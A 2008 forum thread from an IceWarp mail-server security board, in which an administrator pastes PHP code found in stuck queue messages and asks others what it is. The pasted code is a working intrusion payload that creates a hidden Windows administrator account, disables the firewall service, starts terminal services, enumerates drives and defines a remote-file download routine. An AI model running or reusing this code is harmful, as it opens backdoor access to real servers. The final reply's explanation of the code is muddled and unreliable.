Hack attempt?

Hack attempt? (Full Version)

All Forums >> [Security] >> IceWarp Server Security Settings

Message

triangulum -> Hack attempt? (10/13/2008 7:27:56 PM)
I've recently been getting a lot of messages stuck in the queue that are pure PHP code: ------------------------------6a52fd0313af Content-Disposition: form-data; name="data" ob_start(); phpinfo(); $phpinfo = array('phpinfo' => array()); if(preg_match_all('#(?:<h2>(?:<a name=".?">)?(.?)(?:</a>)?</h2>)\|(?:<tr(?: class=".?")?><t[hd](?: class=".?")?>(.?)\s</t[hd]>(?:<t[hd](?: class=".?")?>(.?)\s</t[hd]>(?:<t[hd](?: class=".?")?>(.?)\s</t[hd]>)?)?</tr>)#s', ob_get_clean(), $matches, PREG_SET_ORDER)) foreach($matches as $match) if(strlen($match[1])) $phpinfo[$match[1]] = array(); elseif(isset($match[3])) $phpinfo[end(array_keys($phpinfo))][$match[2]] = isset($match[4]) ? array($match[3], $match[4]) : $match[3]; else $phpinfo[end(array_keys($phpinfo))][] = $match[2]; echo "VULNERABLE\n"; echo "SYSTEM: ".$phpinfo['phpinfo']['System']."\n"; if($_ENV['OS'] == "Windows_NT") { $login ="IWAM_".rand (10000, 99999); $password = "-".rand (10000, 99999)."@"; echo "LOGIN: $login\n"; echo "PASSWORD: $password\n"; @system("net user $login $password /ADD /EXPIRES:NEVER /ACTIVE:YES"); @system("net localgroup administrators $login /add"); @system("net localgroup administrateurs $login /add"); @system("net localgroup administratorens $login /add"); @system("net stop sharedaccess"); @system("net start dcomlaunch"); @system("net start termservice"); taille("c:"); taille("d:"); taille("e:"); taille("f:"); taille("g:"); taille("h:"); taille("i:"); taille("j:"); taille("k:"); taille("l:"); taille("m:"); taille("n:"); taille("o:"); taille("p:"); taille("q:"); taille("r:"); taille("s:"); taille("t:"); taille("u:"); taille("v:"); taille("w:"); taille("x:"); taille("y:"); taille("z:"); } else { taille("/"); } function download($file,$link) { @unlink($file); $get = @file_get_contents($link); $fhack = @fopen ($file, "a"); @fwrite ($fhack, $get); @fclose ($fhack); } function taille($disk) { // Entrez la partition $dt = disk_total_space($disk); // Réentrez la partition $df = disk_free_space($disk); if(!$dt) { return; } $used = $dt - $df; echo "$disk Total: ".getSize($dt)." Free: ".getSize($df)." Used: ".getSize($used)."\n"; } function getSize($taille, $units = "yes") { $dimSize = array("octets", "Ko", "Mo", "Go", "To"); $i = 0; while ($taille >= 1024) { $taille /= 1024; $i++; } return ($units == "yes") ? round($taille, 2) . " " . $dimSize[$i] : round($taille, 2); } ------------------------------6a52fd0313af-- There is no from, to, or subject. Looks like some kind of hack attempt. Does anyone have any idea what this does + advice on how to block these? Chris...

marciohumpris -> RE: Hack attempt? (10/18/2008 3:05:59 AM)
Wow, this is really strange. A message containing code? Where does the message com from? Seems the source code is commented in French. Maybe send the original message to support and try to figure out a bit more. What you mean theyre stuck in queue? In /temp folder?? regards, Marcio

triangulum -> RE: Hack attempt? (10/25/2008 4:44:50 AM)
Hi Marcio They're sitting in the incoming queue and never get passed through anywhere. Theres's no "from" or "to", and I can't link them to a specific connection. I've been going through firewall logs but no luck yet. I think I'll ask support as you suggest.

marciohumpris -> RE: Hack attempt? (10/31/2008 4:45:23 AM)
Hi, Triangulum Quite strange!! Never seen this. I suggest you send to support so they can try to figure it out. If you found out, please keep us posted, were also curious :) regards, Marcio

IceWarpTR Ozcanyildiz -> RE: Hack attempt? (11/12/2008 6:17:52 AM)
Dear Chris; as my experience this is a basic windows system service hacking attempt written in php. This code checks and tries to stop and start some services for remote desktop conn. There are several codes which are trying to find authenticated user credentials, and by this way if you simply logged into the server by any username and password , the server assumes that user is an windows user and the hcker can use this by stopping or starting some services . sşmply it starts a terminal services and by its username and password the hacker can logged in. this means the user is in...if you use Windows Authentication method, the web browser sends the logged in user's credentials to the web server, by this way you can tell what Windows user is logged in. if you are using php-asp auth method by this method noone can see the credentials. Cheers. Ozcan /Turkey

Page: [1]

2001 - 2008 © IceWarp